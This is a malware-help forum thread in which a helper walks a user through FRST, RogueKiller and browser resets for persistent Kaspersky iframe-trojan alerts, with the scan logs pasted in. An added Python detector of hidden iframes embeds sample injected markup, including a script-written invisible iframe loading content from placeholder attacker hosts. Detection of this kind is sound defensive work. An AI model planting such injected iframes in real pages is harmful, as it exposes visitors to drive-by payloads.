
HEUR:Trojan.ScriptIframer constantly blocking malicious urls with svchost.exe


16 replies to this topic

#1 itucs (Members, 9 posts)

Posted 09 December 2015 - 06:17 PM

Hi,
 
Yesterday I started getting popups from Kaspersky stating that it is blocking malicious URLs, even when there is no webpage open and running. When I checked the detailed reports, I saw that it was blocking a trojan named "HEUR:Trojan.ScriptIframer". I ran AdwCleaner and RKill. Then I restarted the computer, which made me realize the popups start when the computer is booted, even before any browser is open. I googled some stuff, installed Malwarebytes and ran a scan with it. It found some malicious files and cleaned them, but it didn't solve the issue. Malwarebytes also started to show some popups with different ports and IPs but the same process, which is "svchost.exe". The popups come up on startup, when a browser is launched, when a new tab is opened even if it is an empty tab, or sometimes when the computer is idle.
 
It is really frustrating, as I ran many scans with different tools and none of them seemed to fix the issue. I tried to explain the problem in as much detail as possible; the screenshots of the popups are attached. Any help will be appreciated.
 
The log of AdwCleaner is pasted below and the Farbar logs are attached to give it a head start. I couldn't paste the Farbar logs because it didn't let me post a message that long, so I attached them. Looking forward to hearing from you soon.
 
Thanks.
 
# AdwCleaner v4.104 - Report created 10/12/2015 at 00:27:35
# Updated 05/12/2014 by Xplode
# Database : 2015-12-07.3 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Arda - ARDA-PC
# Running from : C:\Users\Arda\Desktop\adwcleaner_4.104.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\_acestream_cache_
Folder Deleted : C:\Users\Arda\AppData\LocalLow\.acestream
Folder Deleted : C:\Users\Arda\AppData\Roaming\KW
Folder Deleted : C:\Users\Arda\AppData\Roaming\acestream
Folder Deleted : C:\Users\Arda\AppData\Roaming\.acestream
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKCU\Software\MozillaPlugins\@acestream.net/acestreamplugin,version=3.0.12
Key Deleted : HKCU\SOFTWARE\Clients\Media\AceStream
Key Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.acelive
Key Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.acemedia
Key Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.acestream
Key Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tslive
Key Deleted : HKCU\SOFTWARE\Classes\.acelive
Key Deleted : HKCU\SOFTWARE\Classes\.acemedia
Key Deleted : HKCU\SOFTWARE\Classes\.acestream
Key Deleted : HKCU\SOFTWARE\Classes\.tslive
Key Deleted : HKCU\SOFTWARE\Classes\acestream
Key Deleted : HKCU\SOFTWARE\Classes\AceStream.file
Key Deleted : HKCU\SOFTWARE\Classes\Applications\ace_player.exe
Key Deleted : HKCU\SOFTWARE\Classes\MIME\Database\Content Type\application/x-acestream-plugin
Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [AceUpdater]
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CA3A5461-96B5-46DD-9341-5350D3C94615}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Key Deleted : HKCU\Software\AceStream
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AceStream
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.18098
 
 
-\\ Mozilla Firefox v33.1.1 (x86 en-US)
 
 
-\\ Google Chrome v47.0.2526.80
 
 
-\\ Chromium v
 
 
-\\ Comodo Dragon v
 
 
*************************
 
AdwCleaner[R0].txt - [16867 octets] - [28/10/2014 20:38:16]
AdwCleaner[R1].txt - [1903 octets] - [07/12/2014 00:09:38]
AdwCleaner[R2].txt - [4032 octets] - [09/12/2015 11:09:45]
AdwCleaner[R3].txt - [3138 octets] - [10/12/2015 00:23:21]
AdwCleaner[S0].txt - [14222 octets] - [28/10/2014 20:41:31]
AdwCleaner[S1].txt - [2102 octets] - [07/12/2014 00:12:16]
AdwCleaner[S2].txt - [4253 octets] - [09/12/2015 11:15:42]
AdwCleaner[S3].txt - [3066 octets] - [10/12/2015 00:27:35]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S3].txt - [3126 octets] ##########

Attached Files
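HEUR:Trojan.Script.Iframer is Kaspersky's heuristic verdict for web content that carries an iframe the visitor cannot see (zero-sized, hidden by style, or written out by an inline script) and that pulls in a further payload from elsewhere. The alert fires on the content being fetched, not on a file on disk, which is why every scanner in this thread comes up empty while the popups keep naming whichever process happens to be talking to the network. The Python below is an added example for this page, not code from the thread or from Kaspersky, showing the structural checks such a heuristic makes; the sample page and its hostnames are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Inline-style fragments that keep an element out of view while it still loads its content.
HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I
)
# An <iframe ...> start tag that exists only as a string inside script text
# (document.write / innerHTML injection: the "Script" in the verdict name).
SCRIPT_IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)

# Constructed sample page: a normal video embed, an injected 1x1 hidden frame, and a
# frame written out by an inline script. Hostnames are placeholders, not from the thread.
SAMPLE_PAGE = """<html><body>
<h1>Weather</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="http://bad.example/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
<script type="text/javascript">
document.write('<iframe src="http://evil.example/cnt.php" width="0" height="0" style="display:none"></iframe>');
</script>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects <iframe> attributes from markup and records the raw text of <script> blocks."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []
        self.script_text: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "iframe":
            self.iframes.append({name: (value or "") for name, value in attrs})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag: str) -> None:
        if tag == "script":
            self._in_script = False

    def handle_data(self, data: str) -> None:
        if self._in_script:
            self.script_text.append(data)


def is_tiny(value: str) -> bool:
    """True for a width/height of 0 or 1 (optionally 'px'): the classic invisible geometry."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value)
    return bool(m) and int(m.group(1)) <= 1


def collect_iframes(html: str) -> List[Dict[str, str]]:
    """Return attribute dicts for every iframe, including ones written out by inline scripts."""
    top = IframeCollector()
    top.feed(html)
    top.close()
    found = list(top.iframes)
    for chunk in top.script_text:
        # Undo the common JS quoting so the tag string can be parsed like ordinary markup.
        unescaped = chunk.replace('\\"', '"').replace("\\'", "'")
        for tag in SCRIPT_IFRAME_RE.findall(unescaped):
            inner = IframeCollector()
            inner.feed(tag)
            inner.close()
            for attrs in inner.iframes:
                attrs["_from_script"] = "1"
                found.append(attrs)
    return found


def suspicious_iframes(html: str, page_host: str) -> List[Tuple[str, List[str]]]:
    """Flag frames a reader cannot see and report why, plus whether they load third-party content."""
    hits = []
    for attrs in collect_iframes(html):
        reasons = []
        if is_tiny(attrs.get("width", "")) or is_tiny(attrs.get("height", "")):
            reasons.append("zero-size")
        if HIDDEN_STYLE_RE.search(attrs.get("style", "")):
            reasons.append("hidden-style")
        if not reasons:
            continue  # a visible frame (video embed, ad slot) is not what the heuristic targets
        src = attrs.get("src", "")
        host = urlparse(src).hostname
        if host and host != page_host:
            reasons.append("third-party-src")
        if "_from_script" in attrs:
            reasons.append("written-by-script")
        hits.append((src, reasons))
    return hits


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_PAGE, "weather.example"):
        print(src, reasons)
```

The script pass only catches an iframe that appears as a literal string; injected code that assembles the tag from pieces, runs it through unescape() or eval, or fetches it at runtime needs script emulation, which is what a real engine adds on top of checks like these.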



#2 nasdaq (Malware Response Team, 38,594 posts, Montreal, QC, Canada)

Posted 10 December 2015 - 11:33 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Remove these programs via the Control Panel > Programs and Features applet:
Internet Explorer için Yandex.Bar 6.7 (HKLM-x32\...\{1D1E60B4-BE61-4219-BDF1-5A7622412130}) (Version: 6.7.0.1913 - Yandex)
Popcorn Time (HKU\S-1-5-21-2870111626-1301175785-2031466506-1002\...\Popcorn Time) (Version: - Popcorn Official)
===

ATTENTION: System Restore is disabled
How to: Turn System Restore ON - Windows < Important
http://windows.microsoft.com/en-ca/windows/turn-system-restore-on-off#1TC=windows-7
<<<>>>

Press the Windows key + R on your keyboard at the same time. This will open the Run box.
Type Notepad and click OK.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [ROC_JAN2013_TB] => "C:\Program Files (x86)\AVG Secure Search\ROC_JAN2013_TB.exe"  /PROMPT /CMPID=JAN2013_TB
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [AVG-Secure-Search-Update_JUNE2013_TB] => "C:\Program Files (x86)\AVG Secure Search\AVG-Secure-Search-Update_JUNE2013_TB.exe"  /PROMPT /CMPID=JUNE2013_TB
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\.DEFAULT -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Toolbar: HKU\S-1-5-21-2870111626-1301175785-2031466506-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Toolbar: HKU\S-1-5-21-2870111626-1301175785-2031466506-1002 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF HKLM-x32\...\Firefox\Extensions: [WSVCU@Wondershare.com] - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com => not found
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\pdf.dll => No File
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.3.0\\npsitesafety.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U21) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32.dll => No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
S3 MREMP50; \??\C:\PROGRA~2\COMMON~1\Motive\MREMP50.SYS [X]
S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [X]
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 MRESP50; \??\C:\PROGRA~2\COMMON~1\Motive\MRESP50.SYS [X]
S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [X]
Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{17A9BEC7-F5C8-460F-9E6B-639FA6F7429F}.exe <==== ATTENTION
Task: C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

How is the computer running now?

#3 itucs (Topic Starter, Members, 9 posts)

Posted 10 December 2015 - 05:48 PM

Hello nasdaq,

Thank you for the quick response, I really appreciate it.

I completed the steps in the order you suggested (uninstall the programs, turn System Restore on, run the fix). It didn't seem to fix the issue. I still get the popups I attached to the first post, continuously. Here is the Farbar fix log:

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-12-2015
Ran by Arda (2015-12-11 00:18:18) Run:1
Running from C:\Users\Arda\Desktop
Loaded Profiles: UpdatusUser & Arda (Available Profiles: UpdatusUser & Arda)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [ROC_JAN2013_TB] => "C:\Program Files (x86)\AVG Secure Search\ROC_JAN2013_TB.exe"  /PROMPT /CMPID=JAN2013_TB
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [AVG-Secure-Search-Update_JUNE2013_TB] => "C:\Program Files (x86)\AVG Secure Search\AVG-Secure-Search-Update_JUNE2013_TB.exe"  /PROMPT /CMPID=JUNE2013_TB
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\.DEFAULT -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Toolbar: HKU\S-1-5-21-2870111626-1301175785-2031466506-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Toolbar: HKU\S-1-5-21-2870111626-1301175785-2031466506-1002 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF HKLM-x32\...\Firefox\Extensions: [WSVCU@Wondershare.com] - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com => not found
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\pdf.dll => No File
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.3.0\\npsitesafety.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll => No File
CHR Plugin: (Java™ Platform SE 7 U21) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32.dll => No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
S3 MREMP50; \??\C:\PROGRA~2\COMMON~1\Motive\MREMP50.SYS [X]
S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [X]
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 MRESP50; \??\C:\PROGRA~2\COMMON~1\Motive\MRESP50.SYS [X]
S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [X]
Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{17A9BEC7-F5C8-460F-9E6B-639FA6F7429F}.exe <==== ATTENTION
Task: C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ROC_JAN2013_TB => value removed successfully
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AVG-Secure-Search-Update_JUNE2013_TB => value removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{91397D20-1446-11D4-8AF4-0040CA1127B6} => value not found.
HKCR\CLSID\{91397D20-1446-11D4-8AF4-0040CA1127B6} => key not found. 
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{91397D20-1446-11D4-8AF4-0040CA1127B6} => value removed successfully
HKCR\CLSID\{91397D20-1446-11D4-8AF4-0040CA1127B6} => key not found. 
HKU\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{91397D20-1446-11D4-8AF4-0040CA1127B6} => value not found.
HKCR\CLSID\{91397D20-1446-11D4-8AF4-0040CA1127B6} => key not found. 
"HKCR\PROTOCOLS\Handler\WSWSVCUchrome" => key removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\WSVCU@Wondershare.com => value removed successfully
C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\ppGoogleNaClPluginChrome.dll => not found.
C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\pdf.dll => not found.
C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.3.0\\npsitesafety.dll => not found.
C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll => not found.
C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => not found.
C:\Windows\system32\Macromed\Flash\NPSWF32.dll => not found.
c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => not found.
MREMP50 => service removed successfully
MREMP50a64 => service removed successfully
MREMPR5 => service removed successfully
MRENDIS5 => service removed successfully
MRESP50 => service removed successfully
MRESP50a64 => service removed successfully
C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => moved successfully
C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job => moved successfully
EmptyTemp: => 7.5 GB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 00:28:39 ====


#4 nasdaq (Malware Response Team, 38,594 posts, Montreal, QC, Canada)

Posted 11 December 2015 - 09:04 AM

Reset the browsers that have been compromised.

Reset Chrome...
Open Google Chrome and click on the menu icon at the top right of the Google Chrome window.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Clear your cache and cookies
https://support.google.com/chromebook/answer/183083?hl=en
Select "From the beginning of time"

Restart Chrome.

====

Keep me posted.

#5 itucs (Topic Starter, Members, 9 posts)

Posted 11 December 2015 - 02:14 PM

Hello nasdaq,

I had done that already before posting here; I did it again after your suggestion, but it didn't work. I have to say that it is not related only to Chrome. The popups show up when any application that is connected to the internet wants to do something. I have seen svchost.exe, steamwebhelper.exe, jucheck.exe and even flux, which I am not even sure what it does with a network connection. After a boot, the popups show after you can clearly see something start running in the background, since the computer stalls for a few seconds; then the popups start. This happens even before I start any kind of browser. "Downloading object, which contains a trojan program" is the warning. As I see it, it is a script that is trying to use programs in the background which have network connections and tries to download something with them.

I hope I could give enough details to give you a more accurate insight than my first post. Thanks for your help so far; looking forward to hearing from you.

Arda



#6 nasdaq (Malware Response Team, 38,594 posts, Montreal, QC, Canada)

Posted 11 December 2015 - 02:22 PM

--RogueKiller--
  • Download RogueKiller & SAVE it to your Desktop.
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or Windows 7, right-click and select "Run as Administrator" to start.
  • For Windows XP, double-click to start.
  • Wait until the Prescan has finished...
  • When instructed, click on the "Scan" button.
  • Wait until the Status box shows "Scan Finished".
  • Click on "Report".
  • Click on the Export TXT button and save the file as RogueReport.txt.
  • The file RogueReport.txt will be saved on the desktop.
  • Close the program.
  • Open the file with Notepad and copy/paste the content into your next reply.
<<<>>>

#7 itucs (Topic Starter, Members, 9 posts)

Posted 11 December 2015 - 03:52 PM

Hello nasdaq,

I completed the scan, but I didn't know if I should delete the potentially unwanted registry keys with the tool, as you hadn't stated that in your post. I thought you might suggest something else, so I am not doing anything until you say so, assuming that it should find the same things in a new scan. I will be waiting for your response before I go into action, so I am not clicking delete for now.

You can find the log below.

Thanks,

Arda

 

RogueKiller V11.0.2.0 [Dec  7 2015] (Free) by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Arda [Administrator]
Started from : C:\Users\Arda\Desktop\RogueKiller.exe
Mode : Scan -- Date : 12/11/2015 22:40:32
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 12 ¤¤¤
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Pandora.TV -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 7469b54249d2406ac14f7d7c22138d9d
[BSP] 73c3af7b8366531e03277fe14d3640cb : Linux|VT.Unknown MBR Code
Partition table:
0 - EF | Offset (sectors): 2048 | Size: 200 MB
1 - Mi | Offset (sectors): 411648 | Size: 128 MB
2 -  | Offset (sectors): 673792 | Size: 839700 MB
3 -  | Offset (sectors): 1817037824 | Size: 41043 MB
4 - [SYSTEM] Ba | Offset (sectors): 1901094912 | Size: 25600 MB
5 -  | Offset (sectors): 1720381440 | Size: 1 MB
6 -  | Offset (sectors): 1720383488 | Size: 39043 MB
7 -  | Offset (sectors): 1800343552 | Size: 8151 MB
User = LL1 ... OK
User = LL2 ... OK


#8 nasdaq (Malware Response Team, 38,594 posts, Montreal, QC, Canada)

Posted 12 December 2015 - 07:50 AM

Fix everything.
If needed they will be reset.

#9 itucs (Topic Starter, Members, 9 posts)

Posted 12 December 2015 - 04:22 PM

Hello nasdaq,

I ran the scan again and deleted all the unwanted things in the log below, then restarted the computer, but it didn't seem to solve the issue. I still get the popups. I ran another scan after the deletion and reboot, but RogueKiller did not find any more threats. Unfortunately this seems like a dead end too. I will be waiting for your instructions for a new approach.

Best regards,

Arda

 

RogueKiller V11.0.2.0 [Dec  7 2015] (Free) by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Arda [Administrator]
Started from : C:\Users\Arda\Desktop\RogueKiller.exe
Mode : Scan -- Date : 12/12/2015 22:18:46
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 20 ¤¤¤
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Pandora.TV -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([TURKEY (TR)][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([TURKEY (TR)][-])  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
